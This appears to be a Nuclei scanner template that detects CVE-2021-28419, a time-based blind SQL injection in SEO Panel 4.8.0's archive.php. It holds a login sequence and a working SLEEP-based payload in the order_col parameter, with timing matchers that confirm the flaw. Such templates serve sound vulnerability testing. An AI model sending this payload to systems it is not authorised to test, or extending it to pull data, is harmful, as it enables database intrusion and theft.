id: CVE-2021-28419 info: name: SEO Panel 4.8.0 - Blind SQL Injection author: theamanrawat severity: high description: | SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://github.com/seopanel/Seo-Panel/issues/209 - https://www.seopanel.org/spdownload/4.8.0 - https://nvd.nist.gov/vuln/detail/CVE-2021-28419 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-28419 cwe-id: CWE-89 metadata: verified: "true" tags: cve,cve2021,sqli,seopanel,auth http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Cookie: _csrf={{rand_base(54,"abc")}}; - | POST /login.php HTTP/1.1 Host: {{Hostname}} Origin: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}login.php Cookie: _csrf={{rand_base(54,"abc")}}; sec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login= - | GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1 Host: {{Hostname}} Cookie: _csrf={{rand_base(54,"abc")}}; cookie-reuse: true matchers: - type: dsl dsl: - 'duration_3>=6' - 'status_code_3 == 200' - 'contains(body_3, "Overall Report Summary")' condition: and # Enhanced by md on 2023/03/28